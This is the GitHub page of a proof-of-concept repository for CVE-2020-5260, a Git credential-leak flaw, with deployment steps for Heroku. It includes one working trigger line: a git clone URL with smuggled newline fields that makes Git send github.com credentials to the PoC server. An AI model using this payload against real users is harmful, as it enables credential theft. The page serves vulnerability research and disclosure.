Skip to content

brompwnie/cve-2020-5260

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits

LICENSE

LICENSE

 
 

Procfile

Procfile

 
 

README.md

README.md

 
 

app.json

app.json

 
 

go.mod

go.mod

 
 

main.go

main.go

 
 

Repository files navigation

cve-2020-5260

A HTTP PoC Endpoint for cve-2020-5260 which can be deployed to Heroku

CREDIT INFORMATION

Felix Wilhelm of Google Project Zero https://bugs.chromium.org/p/project-zero/issues/detail?id=2021

Trigger the vuln

git clone 'https://YourHerokuAppNameAndNotMine.herokuapp.com?%0ahost=github.com%0aprotocol=ssh'

Get PoC onto Heroku

Click this button to automagically deploy to Heroku...

Deploy

Or follow the steps below...

Yes, I understand the irony of having to run Git clone commands to setup this PoC....

Install the Heroku CLI via https://devcenter.heroku.com/articles/heroku-cli

If you haven't already, log in to your Heroku account and follow the prompts to create a new SSH public key.

$ heroku login

Clone the repository

Use Git to clone cve-2020-5260's source code to your local machine.

$ mkdir cve-2020-5260
$ cd cve-2020-5260
$ git init
$ heroku apps:create cve-2020-5260
$ git clone https://github.com/brompwnie/cve-2020-5260

Deploy your changes

Make some changes to the code you just cloned and deploy them to Heroku using Git.

$ git add .
$ git commit -am "make it better"
$ git push heroku master

About

A HTTP PoC Endpoint for cve-2020-5260 which can be deployed to Heroku

Resources

Readme

License

MIT license

Code of conduct

Code of conduct

Security policy

Security policy
Activity

Stars

38 stars

Watchers

3 watching

Forks

9 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages